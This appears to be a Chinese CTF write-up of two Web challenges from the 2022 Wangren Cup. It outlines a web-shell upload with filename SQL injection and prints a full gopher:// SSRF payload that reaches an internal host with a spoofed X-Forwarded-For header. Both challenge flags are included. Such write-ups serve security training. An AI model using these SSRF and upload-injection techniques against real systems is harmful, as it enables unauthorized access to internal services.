2022第二届网刃杯网络安全大赛-Web
前言
提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭!
一、Web2-upload
难度系数:4.0
题目描述:只有想不到,没有做不到,sql yyds。题目链接见附件,每个链接均可访问,环境5分钟重启一次。
-
文件上传,随便上传一个马
-
使用Burp抓包
-
根据提示,更改类型
-
上传文件
-
查询到filename上传点,报错注入,获取FLAG
-
flag{5937a0b90b5966939cccd369291c68aa}
二、Web3-Sign_in
难度系数:3.0
题目描述:炒鸡简单的签到题,玩的开心~~~~ 题目链接见附件,每个链接均可访问,环境5分钟重启一次。
-
通过ARP记录得到WEB地址
-
IP: 172.73.24.100
-
经过一步步的提示最终构造Payload 获取FLAG.
-
Payload:
http://124.220.9.19:20001/?
url=gopher://172.73.24.100:80/_POST%2520%252Findex.php%253Fa%253Dflag%2520HTTP%2 52F1.1%250D%250AHost%253A%2520172.73.24.100%250D%250AContent-
Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent- Length%253A%252011%250D%250AX-FORWARDED-
FOR%253A%2520127.0.0.1%250D%250AREFERER%3A%20bolean.club%250D%250A%250D%250Ab%25 3Dflag%250D%250A
- flag{Have_A_GoOd_T1m3!!!}
